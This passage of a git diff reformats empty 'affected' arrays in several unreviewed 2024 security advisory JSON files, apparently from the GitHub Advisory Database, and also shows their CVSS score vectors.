4ee56d2db2c..8ee87bd5016 100644 --- a/advisories/unreviewed/2024/08/GHSA-v6j3-vrgp-vmmj/GHSA-v6j3-vrgp-vmmj.json +++ b/advisories/unreviewed/2024/08/GHSA-v6j3-vrgp-vmmj/GHSA-v6j3-vrgp-vmmj.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-vp6v-8xw7-8j3v/GHSA-vp6v-8xw7-8j3v.json b/advisories/unreviewed/2024/08/GHSA-vp6v-8xw7-8j3v/GHSA-vp6v-8xw7-8j3v.json index d1a4d32a8dc..d56acc6b579 100644 --- a/advisories/unreviewed/2024/08/GHSA-vp6v-8xw7-8j3v/GHSA-vp6v-8xw7-8j3v.json +++ b/advisories/unreviewed/2024/08/GHSA-vp6v-8xw7-8j3v/GHSA-vp6v-8xw7-8j3v.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-vrwq-6v5h-49vq/GHSA-vrwq-6v5h-49vq.json b/advisories/unreviewed/2024/08/GHSA-vrwq-6v5h-49vq/GHSA-vrwq-6v5h-49vq.json index 0892d31b97a..043ab3bb4b7 100644 --- a/advisories/unreviewed/2024/08/GHSA-vrwq-6v5h-49vq/GHSA-vrwq-6v5h-49vq.json +++ b/advisories/unreviewed/2024/08/GHSA-vrwq-6v5h-49vq/GHSA-vrwq-6v5h-49vq.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-w5qf-7xgv-ggv8/GHSA-w5qf-7xgv-ggv8.json b/advisories/unreviewed/2024/08/GHSA-w5qf-7xgv-ggv8/GHSA-w5qf-7xgv-ggv8.json index 396f7c4bf70..f4cf90909e5 100644 --- a/advisories/unreviewed/2024/08/GHSA-w5qf-7xgv-ggv8/GHSA-w5qf-7xgv-ggv8.json +++ b/advisories/unreviewed/2024/08/GHSA-w5qf-7xgv-ggv8/GHSA-w5qf-7xgv-ggv8.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:N/VC:L/VI:H/VA:N/SC:L/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-w62f-8h3g-5r69/GHSA-w62f-8h3g-5r69.json b/advisories/unreviewed/2024/08/GHSA-w62f-8h3g-5r69/GHSA-w62f-8h3g-5r69.json index a363759e500..3da4116f047 100644 --- a/advisories/unreviewed/2024/08/GHSA-w62f-8h3g-5r69/GHSA-w62f-8h3g-5r69.json +++ b/advisories/unreviewed/2024/08/GHSA-w62f-8h3g-5r69/GHSA-w62f-8h3g-5r69.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-x79w-hpfq-wj44/GHSA-x79w-hpfq-wj44.json b/advisories/unreviewed/2024/08/GHSA-x79w-hpfq-wj44/GHSA-x79w-hpfq-wj44.json index 9f072965a82..6a42908d099 100644 --- a/advisories/unreviewed/2024/08/GHSA-x79w-hpfq-wj44/GHSA-x79w-hpfq-wj44.json +++ b/advisories/unreviewed/2024/08/GHSA-x79w-hpfq-wj44/GHSA-x79w-hpfq-wj44.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-x948-4p56-vxgf/GHSA-x948-4p56-vxgf.json b/advisories/unreviewed/2024/08/GHSA-x948-4p56-vxgf/GHSA-x948-4p56-vxgf.json index e8a19f082a4..3205cd091c4 100644 --- a/advisories/unreviewed/2024/08/GHSA-x948-4p56-vxgf/GHSA-x948-4p56-vxgf.json +++ b/advisories/unreviewed/2024/08/GHSA-x948-4p56-vxgf/GHSA-x948-4p56-vxgf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY",